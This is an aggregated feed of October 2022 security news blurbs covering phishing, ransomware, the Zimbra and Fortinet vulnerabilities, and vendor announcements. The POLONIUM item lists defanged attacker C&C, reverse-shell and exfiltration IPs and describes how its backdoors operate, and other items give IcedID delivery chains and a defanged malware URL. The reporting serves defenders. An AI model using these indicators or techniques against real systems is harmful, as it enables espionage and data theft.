                Tags: Bank, awareness, campaign, never say that, security, phish, phishing

                We take a look at an awareness campaign based around the kind of thing you should never hear your bank saying.


                The post Security awareness campaign highlights things your bank will never say appeared first on Malwarebytes Labs.

                "

                Autosummary: Scoping out the scams: The incredibly colourful Banks Never Ask That is a collection of tips focused on four key areas of phishing danger: text messages, mobile payment app scams, email, and phone calls. If you like anti-phishing efforts, hashtags, and confusing but colourful video games, you’ll be interested to know that a security initiative involving all three is now live. Very rarely, scammers will claim that a bank’s site is being updated, or replaced, and moved to a new URL. The rest of the site focuses on specific areas of security related to locking down accounts, using multi-factor authentication, insisting on calling back a bank directly instead of taking a random caller’s word for it, and so on.


                POLONIUM targets Israel with Creepy malware

                exploits
                2022-10-11 https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/

                ESET researchers analyzed previously undocumented custom backdoors and cyberespionage tools deployed in Israel by the POLONIUM APT group

                The post POLONIUM targets Israel with Creepy malware appeared first on WeLiveSecurity

                "

                Autosummary: DYV Tunnels module. Network (IP | First seen | Details):
                37.120.233[.]89 | 2022-09-12 | PapaCreep C&C
                45.80.148[.]119:8080 | 2022-05-21 | Reverse shell server
                45.80.148[.]167:21, 45.80.148[.]167:5055 | 2021-11-27 | Exfiltration
                45.80.148[.]186:8080 | 2022-01-08 | Reverse shell server
                45.80.149[.]22:8080 | 2022-05-13 | CreepySnail C&C
                45.80.149[.]108:8080 | 2022-02-11 | CreepySnail C&C
                45.80.149[.]68:63047 | 2022-03-01 | CreepySnail C&C
                45.80.149[.]71:80 | 2022-03-11 | CreepySnail C&C
                185.244.129[.]79:63047 | 2022-03-01 | CreepySnail C&C
                45.80.149[.]154:1302, 45.80.149[.]154:21 | 2021-09-23 | TechnoCreep C&C, Exfiltration
                185.244.129[.]216:5055 | 2021-11-24 | Exfiltration
                146.70.86[.]6:1433 | 2022-05-26 | Exfiltration
                195.166.100[.]23:5055 | 2022-01-05 | Exfiltration
                45.137.148[.]7:2121 | 2021-10-29 | FlipCreep C&C
                185.203.119[.]99:8080 | 2022-02-12 | Reverse Shell
                212.73.150[.]174 | 2022-02-24 | Tunneling
                94.156.189[.]103 | 2022-04-20 | Tunneling
                51.83.246[.]73 | 2022-03-12 | Tunneling
                MITRE ATT&CK techniques: this table was built using version 11 of the MITRE ATT&CK framework.
                As shown in Figure 1, POLONIUM’s toolset consists of seven custom backdoors: CreepyDrive, which abuses OneDrive and Dropbox cloud services for C&C; CreepySnail, which executes commands received from the attackers’ own infrastructure; DeepCreep and MegaCreep, which make use of Dropbox and Mega file storage services respectively; and FlipCreep, TechnoCreep, and PapaCreep, which receive commands from attacker’s servers. Some of the most interesting characteristics of the group’s toolset are: Abundance of tools: We have seen seven different custom backdoors used by the group since September 2021, and also saw many other malicious modules for logging keystrokes, taking screenshots, executing commands, taking photos with the webcam, or exfiltrating files. Verticals targeted by this group include engineering, information technology, law, communications, branding and marketing, media, insurance, and social services.
                In the example, two methods from PRLib.dll are called: CHP, which kills running processes with the same name as the backdoor’s executable (i.e., previous executions of the backdoor that are still running), and XVDFv, which implements persistence (in the same way we described for DeepCreep). FlipCreep creates a folder with the username of the target on the FTP server, along with these subfolders: Files: stores files uploaded from the victims; orders: stores output from commands executed with cmd.exe. Persistence is achieved in the same way as was described for DeepCreep. Other modules: To spy on their victims, POLONIUM uses several other modules on top of their backdoors, including reverse shell modules and a module for creating a tunnel. T1082 System Information Discovery: TechnoCreep and POLONIUM’s reverse shell module send information such as computer name, username, and operating system to a remote server, in order to identify their victims. The main code for the backdoor was placed in a DLL file, MainZero.dll, and other routines that communicate with Mega were placed in another DLL, MagLibrary.dll. download "<file_name_on_dropbox>" "<local_file_path>" <bool_abs_p>: Downloads a file from the root folder in Dropbox to the victim’s computer. Cloud services: The group abuses common cloud services such as Dropbox, OneDrive, and Mega for C&C communications (receive commands and exfiltrate data). On a similar note, they like to divide the code in their backdoors, distributing malicious functionality into various small DLLs, perhaps expecting that defenders or researchers will not observe the complete attack chain.
                A command to be executed by the backdoor is read from the file cd.txt on the server-side root folder of the victim; once read, the file is deleted from the cloud. FlipCreep: FlipCreep is another previously undocumented backdoor written in C# that has a very similar flow of execution as the other backdoors that we have described: it reads commands from orders.txt – a text file stored on an FTP server operated by POLONIUM – and can upload or download files from the server. In some other cases, we have seen a module, coded from scratch, that followed the same logic as some previous components. "


                Lack of transparency, systemic risks weaken national cybersecurity preparedness

                ciber
                2022-10-10 https://www.helpnetsecurity.com/2022/10/10/national-cybersecurity-preparedness/

                What is critical infrastructure? If you ask 5 different people, you may receive 5 different answers. The term critical infrastructure has lost much of its meaning as a differentiator of private entities and currently defines sectors from energy to commercial facilities. Bob Kolasky, SVP for Critical Infrastructure at Exiger, previously served as Assistant Director for Cybersecurity and Infrastructure Security Agency (CISA), and in this Help Net Security interview talks about protecting critical infrastructure, the importance … More

                The post Lack of transparency, systemic risks weaken national cybersecurity preparedness appeared first on Help Net Security.

                "

                Autosummary: Bob Kolasky, SVP for Critical Infrastructure at Exiger, previously served as Assistant Director for Cybersecurity and Infrastructure Security Agency (CISA), and in this Help Net Security interview talks about protecting critical infrastructure, the importance of information-sharing, national cybersecurity preparedness, and more. The United States defines critical infrastructure as the “systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters.” "


                Harvard Business Publishing licensee hit by ransomware

                exploits ransomware
                2022-10-10 https://securityaffairs.co/wordpress/136860/cyber-crime/harvard-business-publishing-licensee-hit-by-ransomware.html

                Threat actors got to a database with over 152,000 customer records before its owner, the Turkish branch of Harvard Business Review, closed it. Crooks left a ransom note, threatening to leak the data and inform authorities of the EU’s General Data Protection Regulation (GDPR) violations. Original Post published on CyberNews A recent discovery by the […]

                The post Harvard Business Publishing licensee hit by ransomware appeared first on Security Affairs.

                "

                Autosummary: In total, the database leaked over 152,000 pieces of information pertaining to customers, such as emails, names, links to LinkedIn, Twitter, and Facebook profiles, and hashed passwords. “Exposing sensitive data or allowing it to get into the wrong hands can have a cascading effect, leading to regulatory and compliance fines, potential lawsuits and legal fines, reputational damage including lost customer confidence, and a financial impact including lost business,” Neclerio said. The database index marked “Users” contained over 152,000 entries: names, emails, links to social media profiles, and passwords, some of which were hashed using a very weak MD5 algorithm. "


                Unpatched Zimbra RCE bug exploited by attackers (CVE-2022-41352)

                exploits
                2022-10-10 https://www.helpnetsecurity.com/2022/10/10/cve-2022-41352/

                A still unpatched vulnerability (CVE-2022-41352) in Zimbra Collaboration is being exploited by attackers to achieve remote code execution on vulnerable servers. About the vulnerability Zimbra Collaboration (formerly Zimbra Collaboration Suite) is a cloud-hosted collaboration software suite that also includes an email server component and a web client component. CVE-2022-41352 exists due to Zimbra’s Amavis antivirus engine using the cpio method to scan inbound emails. “CVE-2022-41352 is effectively identical to CVE-2022-30333 but leverages a different file format … More

                The post Unpatched Zimbra RCE bug exploited by attackers (CVE-2022-41352) appeared first on Help Net Security.

                "

                Autosummary: Security-wise, this has been a bad year for Zimbra and its users: as documented in this CISA alert, five other vulnerabilities have been exploited by attackers since the beginning of the year, and now CVE-2022-41352. "


                Fortinet says critical auth bypass bug is exploited in attacks

                exploits
                2022-10-10 https://www.bleepingcomputer.com/news/security/fortinet-says-critical-auth-bypass-bug-is-exploited-in-attacks/
                Fortinet has confirmed today that a critical authentication bypass security vulnerability patched last week is being exploited in the wild. [...] "

                Autosummary: The complete list of Fortinet vulnerable products exposed to attacks attempting to exploit the CVE-2022-40 flaw if left unpatched includes:
                FortiOS: 7.2.1, 7.2.0, 7.0.6, 7.0.5, 7.0.4, 7.0.3, 7.0.2, 7.0.1, 7.0.0
                FortiProxy: 7.2.0, 7.0.6, 7.0.5, 7.0.4, 7.0.3, 7.0.2, 7.0.1, 7.0.0
                FortiSwitchManager: 7.2.0, 7.0.0
                Fortinet released security patches last week and asked customers to update vulnerable devices to FortiOS 7.0.7 or 7.2.2 and above, FortiProxy 7.0.7 or 7.2.1 and above, and FortiSwitchManager 7.2.1 or above to defend their devices from attacks. "


                Caffeine service lets anyone launch Microsoft 365 phishing attacks

                financial
                2022-10-10 https://www.bleepingcomputer.com/news/security/caffeine-service-lets-anyone-launch-microsoft-365-phishing-attacks/
                A phishing-as-a-service (PhaaS) platform named "Caffeine" makes it easy for threat actors to launch attacks, featuring an open registration process allowing anyone to jump in and start their own phishing campaigns. [...] "

                Autosummary: Caffeine’s main dashboard (Mandiant). Next, the operators must purchase a subscription license, which costs $250 per month, $450 for three months, or $850 for six months, depending on the features. "


                Hackers behind IcedID malware attacks diversify delivery tactics

                exploits industry
                2022-10-10 https://www.bleepingcomputer.com/news/security/hackers-behind-icedid-malware-attacks-diversify-delivery-tactics/
                The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets. [...] "

                Autosummary: Diversifying the delivery chain. Between September 13 and 21, Cymru analysts noticed the following different delivery methods of IcedID on targets:
                Password Protected ZIP -> ISO -> LNK -> JS -> [CMD or BAT] -> DLL
                Password Protected ZIP -> ISO -> CHM -> DLL
                Password Protected ZIP -> ISO -> LNK -> BAT -> DLL
                Malicious Word or Excel documents laced with macros
                Delivered directly via the PrivateLoader pay-per-install service
                These campaigns used either the Italian language or English, with the former having smaller-scale success than the latter. "


                CVE-2022-40684 flaw in Fortinet products is being exploited in the wild

                exploits
                2022-10-10 https://securityaffairs.co/wordpress/136905/breaking-news/cve-2022-40684-fortinet-products-exploited.html

                Fortinet has confirmed that the recently disclosed critical authentication bypass issue (CVE-2022-40684) is being exploited in the wild. Last week, Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted FortiGate firewalls and FortiProxy web proxies. An attacker can exploit the vulnerability to log into vulnerable devices. “An authentication bypass using an alternate […]

                The post CVE-2022-40684 flaw in Fortinet products is being exploited in the wild appeared first on Security Affairs.

                "

                Autosummary: Last week, Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted FortiGate firewalls and FortiProxy web proxies. "


                Week in review: 7 cybersecurity audiobooks to read, Patch Tuesday forecast

                ciber
                2022-10-09 https://www.helpnetsecurity.com/2022/10/09/week-in-review-7-cybersecurity-audiobooks-to-read-patch-tuesday-forecast/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MS Exchange zero-days: The calm before the storm? CVE-2022-41040 and CVE-2022-41082, the two exploited MS Exchange zero-days that still have no official fix, have been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog. October 2022 Patch Tuesday forecast: Looking for treats, not more tricks We’ve entered the final quarter of 2022 with a favorite holiday for many – Halloween, at … More

                The post Week in review: 7 cybersecurity audiobooks to read, Patch Tuesday forecast appeared first on Help Net Security.

                "

                Autosummary: Infosec products of the month: September 2022 Here’s a look at the most interesting products from the past month, featuring releases from: 42Crunch, Avetta, Cloudflare, Code42, Commvault, D3 Security, Illumio, Kingston Digital, Malwarebytes, Netography, novoShield, Onfido, Socure, TransUnion, and Truecaller. New infosec products of the week: October 7, 2022 Here’s a look at the most interesting products from the past week, featuring releases from HashiCorp, Legit Security, LiveAction, LogRhythm, Pentest People, and Verica. APIs are quickly becoming the most popular attack vector In this Help Net Security video, Shay Levi, CTO at Noname Security, discusses the findings from a recent API security report, which reveals a growing number of API security incidents, a concerning lack of API visibility, and a level of misplaced confidence in existing controls. "


                CommonSpirit hospital chains hit by ransomware, patients are facing problems

                exploits ransomware
                2022-10-09 https://securityaffairs.co/wordpress/136843/cyber-crime/commonspirit-ransomware-attack.html

                CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that impacted its operations. Common Spirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe inconvenience to the facilities and to patients. The alleged security breach led to delayed surgeries, hold-ups in […]

                The post CommonSpirit hospital chains hit by ransomware, patients are facing problems appeared first on Security Affairs.

                "

                Autosummary: Common Spirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe inconvenience to the facilities and to patients. The alleged security breach led to delayed surgeries, hold-ups in patient care and forced the chain to reschedule doctor appointments across the country. "


                Solana Phantom security update NFTs push password-stealing malware

                exploits
                2022-10-09 https://www.bleepingcomputer.com/news/security/solana-phantom-security-update-nfts-push-password-stealing-malware/
                Hackers are airdropping NFTs to Solana cryptocurrency owners pretending to be alerts for a new Phantom security update that lead to the installation of password-stealing malware and the theft of cryptocurrency wallets. [...] "

                Autosummary: windll32.exe malware installed on Windows (Source: BleepingComputer). According to VirusTotal, the windll32.exe file is a password-stealing malware that attempts to steal browser information, such as history, cookies, and passwords, as well as SSH keys and other information. "


                Fake adult sites push data wipers disguised as ransomware

                exploits ransomware
                2022-10-09 https://www.bleepingcomputer.com/news/security/fake-adult-sites-push-data-wipers-disguised-as-ransomware/
                Malicious adult websites push fake ransomware which, in reality, acts as a wiper that quietly tries to delete almost all of the data on your device. [...] "

                Autosummary: The drive wiper’s code (Cyble). Finally, the malware executes "open.exe," which drops and runs "open.bat," which, in turn, connects to the URL "hxxps[:]//lllllllllll.loseyourip[.]com/downloads" and then opens the ransom note. "


                Everest gang demands $200K for data stolen from South Africa state-owned electricity company ESKOM

                government
                2022-10-09 https://securityaffairs.co/wordpress/136866/cyber-crime/south-africa-eskom-everest-ransomware.html

                Everest ransomware operators claimed to have hacked South Africa state-owned company ESKOM Hld SOC Ltd. In March 2022, the Everest ransomware operators published a notice announcing the sale of “South Africa Electricity company’s root access” for $125,000. Eskom transforms inputs from the natural environment – coal, nuclear, fuel, diesel, water, and wind – into more […]

                The post Everest gang demands $200K for data stolen from South Africa state-owned electricity company ESKOM appeared first on Security Affairs.

                "

                Autosummary: pic.twitter.com/JQefRtF9Oj — DarkTracer: DarkWeb Criminal Intelligence (@darktracer_int), March 18, 2022. Eskom transforms inputs from the natural environment – coal, nuclear, fuel, diesel, water, and wind – into more than 90% of the energy supplied to a wide range of customers in South Africa and the Southern African Development Community (SADC) region. "


                Fake Solana Phantom security updates push crypto-stealing malware

                exploits
                2022-10-09 https://www.bleepingcomputer.com/news/security/fake-solana-phantom-security-updates-push-crypto-stealing-malware/
                Hackers are airdropping NFTs to Solana cryptocurrency owners pretending to be alerts for a new Phantom security update that lead to the installation of password-stealing malware and the theft of cryptocurrency wallets. [...] "

                Autosummary: windll32.exe malware installed on Windows (Source: BleepingComputer). According to VirusTotal, the windll32.exe file is a password-stealing malware that attempts to steal browser information, such as history, cookies, and passwords, as well as SSH keys and other information. "


                Semtech’s LoRa Connect optimizes CWD Limited’s dual combo module for IoT device connectivity

                industry
                2022-10-08 https://www.helpnetsecurity.com/2022/10/08/semtech-cwd-limited/

                Semtech has announced that CWD Limited has developed a dual combo module incorporating Semtech’s LoRa Connect platform and the LoRaWAN standard connectivity as well as Bluetooth Low Energy (BLE) to optimize high data rate, long range wireless communication for IoT device connectivity. The CWD CBTLRM02 dual combo module is utilized in smart utility meters and wearables with Semtech’s LoRa Connect (SX1262) System on Chip (SoC) for communication in the 150MHz to 960MHz bands for LoRa … More

                The post Semtech’s LoRa Connect optimizes CWD Limited’s dual combo module for IoT device connectivity appeared first on Help Net Security.

                "

                Autosummary: "


                Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite

                exploits
                2022-10-08 https://thehackernews.com/2022/10/hackers-exploiting-unpatched-rce-flaw.html
                A severe remote code execution vulnerability in Zimbra’s enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue. The shortcoming, assigned CVE-2022-41352, carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected "

                Autosummary: The vulnerability, which is present in versions 8.8.15 and 9.0 of the software, affects several Linux distributions such as Oracle Linux 8, Red Hat Enterprise Linux 8, Rocky Linux 8, and CentOS 8, with the exception of Ubuntu due to the fact that pax is already installed by default. "


                Unpatched remote code execution flaw in Zimbra Collaboration Suite actively exploited

                exploits
                2022-10-08 https://securityaffairs.co/wordpress/136800/hacking/zimbra-collaboration-suite-rce.html

                Threat actors are exploiting an unpatched severe remote code execution vulnerability in the Zimbra collaboration platform. Researchers from Rapid7 are warning of the exploitation of an unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352, in the Zimbra Collaboration Suite. Rapid7 has published technical details, including a proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding […]

                The post Unpatched remote code execution flaw in Zimbra Collaboration Suite actively exploited appeared first on Security Affairs.

                "

                Autosummary:
                Oracle Linux 8: Vulnerable
                Red Hat Enterprise Linux 8: Vulnerable
                Rocky Linux 8: Vulnerable
                CentOS 8: Vulnerable
                Ubuntu 20.04: Not vulnerable (pax is installed by default)
                Ubuntu 18.04: Not vulnerable (pax is installed, cpio has Ubuntu’s custom patch)
                Zimbra is going to address it by removing the dependency on cpio by making pax a prerequisite for Zimbra Collaboration Suite. “If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot. "


                BlackByte Ransomware abuses vulnerable driver to bypass security solutions

                exploits ransomware
                2022-10-08 https://securityaffairs.co/wordpress/136816/malware/blackbyte-ransomware-byovd-attack.html

                The BlackByte ransomware operators are leveraging a flaw in a legitimate Windows driver to bypass security solutions. Researchers from Sophos warn that BlackByte ransomware operators are using a bring your own vulnerable driver (BYOVD) attack to bypass security products. In BYOVD attacks, threat actors abuse vulnerabilities in legitimate, signed drivers, on which security products rely, […]

                The post BlackByte Ransomware abuses vulnerable driver to bypass security solutions appeared first on Security Affairs.

                "

                Autosummary: “Bring Your Own Driver” is the name given to this technique [1, 2, 3, 4, 5, 6] — exploiting a targeted system by abusing a legitimate signed driver with an exploitable vulnerability.” "


                ADATA denies RansomHouse cyberattack, says leaked data from 2021 breach

                ciber
                2022-10-08 https://www.bleepingcomputer.com/news/security/adata-denies-ransomhouse-cyberattack-says-leaked-data-from-2021-breach/
                Taiwanese chip maker ADATA denies claims of a RansomHouse cyberattack after the threat actors began posting the company’s stolen files on their data leak site. [...] "

                Autosummary: Comparing the timestamps on the data shared by RansomHouse with the data leaked by Ragnar Locker in June 2021, both sets of stolen data have similar timestamps, with no file being newer than May 2021. "


                Callback phishing attacks evolve their social engineering tactics

                financial industry
                2022-10-08 https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-evolve-their-social-engineering-tactics/
                The BazarCall malicious operation has evolved its social engineering methods, keeping the old fake charges lure for the first phase of the attack but then switching to pretending to help the victim deal with an infection or hack. [...] "

                Autosummary: New social engineering tricks The social engineering process has changed in recent callback phishing campaigns, although the bait in the phishing email remains the same, an invoice for a payment made to Geek Squad, Norton, McAfee, PayPal, or Microsoft. "


                Notabene SafePII prevents phishing attacks in sensitive compliance systems

                financial
                2022-10-07 https://www.helpnetsecurity.com/2022/10/07/notabene-safepii/

                On a mission to enable secure and trusted crypto transactions, Notabene launched SafePII, an end-to-end Encrypted Escrow Service for personally identifiable information (PII), created explicitly for Travel Rule compliant transfers. This launch is the latest addition to Notabene’s comprehensive bank-grade protection solution and elevates its continued commitment to privacy and security in protecting consumer data at the highest level. SafePII facilitates the secure exchange of PII data by encrypting the data format between parties, eliminating … More

                The post Notabene SafePII prevents phishing attacks in sensitive compliance systems appeared first on Help Net Security.

                "

                Autosummary: On a mission to enable secure and trusted crypto transactions, Notabene launched SafePII, an end-to-end Encrypted Escrow Service for personally identifiable information (PII), created explicitly for Travel Rule compliant transfers. "


                Veratad VX improves identity verification and analytics for business users

                industry
                2022-10-07 https://www.helpnetsecurity.com/2022/10/07/veratad-vx/

                Veratad announced the unveiling of “Veratad VX” – a new global age and identity verification platform designed to deliver a no-code journey orchestration and automated verification experience. The new VX orchestration platform is an extension of Veratad’s proven core technology, IDresponse, which currently synthesizes dozens of providers and verification methods, allowing clients to access them through a single API integration. Veratad VX business users can now create sophisticated, multi-touch customer verification workflows without touching a line … More

                The post Veratad VX improves identity verification and analytics for business users appeared first on Help Net Security.

                "

                Autosummary: "


                Phosphorus enhances its xIoT security platform to strengthen enterprise device security

                industry
                2022-10-07 https://www.helpnetsecurity.com/2022/10/07/phosphorus-enterprise-xiot-security-platform/

                Phosphorus announced important new enhancements to its Enterprise xIoT Security Platform that will improve organizations’ ability to reduce their xIoT attack surface and prevent sophisticated threats. “The proliferation of xIoT devices is creating vast new risks for today’s enterprises, with attackers increasingly able to evade defenses and breach companies through these overlooked and often unmonitored devices,” said Sonu Shankar, VP of Product Management at Phosphorus. “Our xIoT security platform already provides unmatched capabilities for finding, … More

                The post Phosphorus enhances its xIoT security platform to strengthen enterprise device security appeared first on Help Net Security.

                "

                Autosummary: Phosphorus’s Enterprise xIoT Security Platform is a consolidated xIoT security offering, delivering Attack Surface Management, Hardening and Remediation, and Detection and Response across the full range of IoT, OT, and Network-connected devices—spanning both new and legacy devices. "


                What $1B in cybersecurity funding can mean for US state, local governments

                government ciber
                2022-10-07 https://www.helpnetsecurity.com/2022/10/07/us-state-local-governments-spend-cybersecurity-budget/

                How do you best spend a cybersecurity budget you have long been hoping you’d get? That’s the question state, local, and territorial (SLT) governments are starting to ask themselves in the wake of a major September announcement from the Department of Homeland Security. DHS will be doling out $1 billion in funding over the next four years as part of a first-of-its-kind cybersecurity grant program specifically aimed at SLT governments. The Cybersecurity and Infrastructure Security … More

                The post What $1B in cybersecurity funding can mean for US state, local governments appeared first on Help Net Security.

                "

                Autosummary: The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Emergency Management Agency (FEMA) are jointly managing the grants, and CISA has laid out the overarching goals for the funding:
                Implement cyber governance and planning
                Assess and evaluate systems and capabilities
                Mitigate prioritized issues, and
                Build a cybersecurity workforce
                While the designated State Administrative Agency (SAA) for each state and territory is the only entity eligible to apply for funding (this fact sheet does a great job of summarizing what you need to know), the legislation requires states to distribute at least 80% of funds to local governments, with a minimum of 25% of the allocated funds distributed to rural areas. After decades of experience in IT security, networking, and compliance (I helped found the Symantec State Local and Education division), I’d say start here:
                Identify what is aging and vulnerable
                Know your gaps and design a road map around them
                Your list of potential projects is probably going to be a long one, so prioritization is key
                Sometimes understanding the company you find yourself in can help. "


                LilithBot Malware, a new MaaS offered by the Eternity Group

                exploits
                2022-10-07 https://securityaffairs.co/wordpress/136764/breaking-news/lilithbot-malware-eternity-group.html

                Researchers linked the threat actor behind the Eternity malware-as-a-service (MaaS) to a new malware strain called LilithBot. Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka EternityTeam; Eternity Project). The Eternity group operates a homonymous malware-as-a-service (MaaS), it is linked to the Russian “Jester Group,” which is […]

                The post LilithBot Malware, a new MaaS offered by the Eternity Group appeared first on Security Affairs.

                "

                Autosummary: “Eternity uses an as-a-service subscription model to distribute different Eternity-branded malware modules in underground forums, including a stealer, miner, botnet, ransomware, worm+dropper, and DDoS bot.” "


                Hackers Can Use "App Mode" in Chromium Browsers for Stealth Phishing Attacks

                financial
                2022-10-07 https://thehackernews.com/2022/10/hackers-can-use-app-mode-in-chromium.html
                In what’s a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications." Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website’s favicon and hiding the "

                Autosummary: "


                BlackByte Ransomware Abuses Vulnerable Windows Driver to Disable Security Solutions

                exploits ransomware
                2022-10-07 https://thehackernews.com/2022/10/blackbyte-ransomware-abuses-vulnerable.html
                In yet another case of bring your own vulnerable driver (BYOVD) attack, the operators of the BlackByte ransomware are leveraging a flaw in a legitimate Windows driver to bypass security solutions. "The evasion technique supports disabling a whopping list of over 1,000 drivers on which security products rely to provide protection," Sophos threat researcher Andreas Klopsch said in a new technical "

                Autosummary: "


                Hackers exploiting unpatched RCE bug in Zimbra Collaboration Suite

                exploits
                2022-10-07 https://www.bleepingcomputer.com/news/security/hackers-exploiting-unpatched-rce-bug-in-zimbra-collaboration-suite/
                Hackers are actively exploiting an unpatched remote code execution (RCE) vulnerability in Zimbra Collaboration Suite (ZCS), a widely deployed web client and email server. [...] "

                Autosummary: "If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot," warned the September security advisory. "


                Fortinet warns admins to patch critical auth bypass bug immediately

                exploits
                2022-10-07 https://www.bleepingcomputer.com/news/security/fortinet-warns-admins-to-patch-critical-auth-bypass-bug-immediately/
                Fortinet has warned administrators to update FortiGate firewalls and FortiProxy web proxies to the latest versions, which address a critical severity vulnerability. [...] "



                The essentials of GRC and cybersecurity — How they empower each other

                ciber
                2022-10-07 https://thehackernews.com/2022/10/the-essentials-of-grc-and-cybersecurity.html
Understanding the connection between GRC and cybersecurity When talking about cybersecurity, Governance, Risk, and Compliance (GRC) is often considered the least exciting part of business protection. However, its importance can't be ignored, and this is why. While cybersecurity focuses on the technical side of protecting systems, networks, devices, and data, GRC is the tool that will help the

Autosummary: Governance, Risk, and Compliance (GRC) is a business strategy for managing a company's overall governance, enterprise risk management, and regulatory compliance. The OCEG has developed its Capability Model (Red Book) as an open-source methodology that merges the sub-disciplines of governance, risk, audit, compliance, ethics/culture, and IT into a unified approach; organizations might also use this GRC Capability Model with more specific functional frameworks, such as ISO, COSO, ISACA, IIA, NIST, and others. As a process, it would look like this: learning business plans and goals, understanding strategic objectives, being aware of the current and future compliance activities, and connecting with the key stakeholders. With an integrated approach, organizations will increase efficiencies, enhance security posture, tell better security stories, improve visibility across the board, increase support from leadership, and avoid compliance/regulatory fines. In summary, a well-planned GRC program enables organizations to collect and maintain high-quality information, improve decision making, promote collaboration, increase accountability, build a strong culture, increase efficiency and agility, provide visibility, reduce costs by supporting suitable investments, increase integration, and protect the company's value and reputation.


                The Week in Ransomware - October 7th 2022 - A 20 year sentence

                exploits ransomware
                2022-10-07 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-7th-2022-a-20-year-sentence/
It was a very quiet week regarding ransomware news, with the most significant news being the sentencing of a Netwalker affiliate to 20 years in prison. [...]

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @DanielGallagher, @malwrhunterteam, @demonslay335, @malwareforme, @Seifreed, @billtoulas, @jorntvdw, @serghei, @fwosar, @FourOctets, @BleepinComputer, @struppigel, @Ionut_Ilascu, @VK_Intel, @LawrenceAbrams, @PolarToffee, @Avast, @Sophos, @sygnia_labs, @BrettCallow, @pcrisk, @jgreigj, @lorenzofb, and @elhackernet.


                VMware fixed a high-severity bug in vCenter Server

                exploits
                2022-10-07 https://securityaffairs.co/wordpress/136791/security/vmware-vcenter-server-flaws.html

                VMware this week addressed a severe vulnerability in vCenter Server that could lead to arbitrary code execution. VMware on Thursday released security patches to address a code execution vulnerability, tracked as CVE-2022-31680 (CVSS score of 7.2), in vCenter Server. The security issue is an unsafe deserialization vulnerability that resides in the platform services controller (PSC). […]

The post VMware fixed a high-severity bug in vCenter Server appeared first on Security Affairs.


                Romance scammer given 25 years of alone time

                financial
                2022-10-07 https://www.malwarebytes.com/blog/news/2022/10/romance-and-business-email-compromise-scammer-given-25-years-of-alone-time

Categories: News

Tags: Scam, spam, phish, BEC, business email compromise, romance, fake, fraud, wire, money mule

                We take a look at a scammer, involved in both BEC fraud and romance scams, who has been jailed for a whopping 25 years.

                (Read more...)

The post Romance scammer given 25 years of alone time appeared first on Malwarebytes Labs.

Autosummary: Once the fraud proceeds were posted to his accounts, Ogiekpolor laundered the funds, including wiring hundreds of thousands of dollars to overseas accounts, and withdrawing substantial amounts in cash and cashier’s checks.


Malwarebytes' modernized bug bounty program—here's all you need to know

                exploits
                2022-10-07 https://www.malwarebytes.com/blog/business/2022/10/malwarebytes-bugbounty-modernized-why-how-where

                Categories: Business

We've updated our bug bounty program with increased rewards and a new way to submit vulnerabilities

                (Read more...)

The post Malwarebytes' modernized bug bounty program—here's all you need to know appeared first on Malwarebytes Labs.

Autosummary: Reward scale by severity: Critical $2,000-$5,000; High $500-$2,000; Medium $100-$500; Low $20-$100. Submitting a vulnerability report: to ease the complex bug bounty process, we rely on HackerOne, which provides an interface between researchers and our security team.


                Pradeo acquires Yagaan, strengthens its cybersecurity services unification strategy

                ciber
                2022-10-06 https://www.helpnetsecurity.com/2022/10/06/pradeo-acquires-yagaan/

Pradeo, a global leader in mobile fleet and application security, has entered into exclusive negotiations for the acquisition of Yagaan, an application security software company based in France. The mobile security leader is thus strengthening its path towards unifying cybersecurity services by providing comprehensive expertise and solutions in the fast-growing mobile security market. In 2021, the global mobile security market was valued at $3.96 billion and the global application security market was valued at $6.95 billion, … More

The post Pradeo acquires Yagaan, strengthens its cybersecurity services unification strategy appeared first on Help Net Security.

Autosummary: Pradeo’s objective is to become the sole contact for CISOs, application developers, auditors, device manufacturers and other cybersecurity stakeholders for all issues related to the protection of mobile applications and associated web services, as well as smartphones and tablets.


                Shield InfoBarriers protects banks and finance firms against data leakage

                financial
                2022-10-06 https://www.helpnetsecurity.com/2022/10/06/shield-infobarriers/

                Shield launched surveillance capabilities that enable banks and finance firms to bring communication compliance into the control room and protect against data leaks. InfoBarriers, the company’s newest AI-model, is included in the latest version of Shield (3.2), which introduces additional new and substantial capabilities unmatched by existing legacy vendors and emerging startups. Also included in Shield 3.2 are enhanced search analytics, case workspaces for more visibility and traceability into eDiscovery, and further refinements to user … More

The post Shield InfoBarriers protects banks and finance firms against data leakage appeared first on Help Net Security.

Autosummary: All combined, InfoBarriers, enhanced search analytics, data visualization capabilities, and Shield’s user interface upgrades that are included in Shield 3.2 empower firms to bring surveillance into the control room.


                Fine-tuning Germany’s cybersecurity strategy

                ciber
                2022-10-06 https://www.helpnetsecurity.com/2022/10/06/germany-cybersecurity-strategy/

